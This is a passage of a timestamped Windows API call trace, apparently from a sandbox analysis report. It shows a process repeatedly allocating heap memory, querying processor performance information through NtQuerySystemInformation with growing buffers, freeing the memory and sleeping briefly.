RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.155] Sleep (dwMilliseconds=0x110) [0305.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0305.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0305.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0305.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0305.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0305.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0305.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0305.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0305.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.173] Sleep (dwMilliseconds=0x110) [0305.184] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0305.185] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.185] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0305.185] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0305.185] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.186] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0305.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0305.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.186] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0305.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0305.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0305.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.187] Sleep (dwMilliseconds=0x110) [0305.200] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0305.200] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0305.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0305.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0305.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0305.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0305.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0305.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0305.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.203] Sleep (dwMilliseconds=0x110) [0305.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0305.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.216] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0305.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0305.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0305.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0305.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0305.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0305.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0305.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.217] Sleep (dwMilliseconds=0x110) [0305.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0305.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0305.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0305.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0305.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0305.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0305.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0305.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0305.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.235] Sleep (dwMilliseconds=0x110) [0305.247] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0305.247] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0305.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0305.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0305.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0305.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0305.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0305.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0305.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.249] Sleep (dwMilliseconds=0x110) [0305.263] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0305.263] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.263] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0305.263] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0305.263] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0305.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0305.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0305.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0305.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0305.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.266] Sleep (dwMilliseconds=0x110) [0305.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0305.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0305.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0305.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0305.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0305.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0305.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0305.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0305.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.282] Sleep (dwMilliseconds=0x110) [0305.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0305.294] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.294] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0305.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0305.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0305.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0305.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0305.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0305.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0305.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.297] Sleep (dwMilliseconds=0x110) [0305.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0305.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.310] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0305.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0305.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0305.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0305.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0305.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0305.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0305.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.313] Sleep (dwMilliseconds=0x110) [0305.325] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0305.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0305.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0305.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0305.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0305.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0305.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0305.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0305.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.330] Sleep (dwMilliseconds=0x110) [0305.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0305.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0305.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0305.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0305.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0305.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0305.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0305.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0305.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.345] Sleep (dwMilliseconds=0x110) [0305.356] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0305.357] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.357] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0305.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0305.357] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.358] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0305.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0305.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0305.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0305.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0305.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0305.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0305.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0305.360] Sleep (dwMilliseconds=0x110) [0305.372] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0305.372] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0305.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0305.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0305.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0305.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0305.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0305.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0305.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, 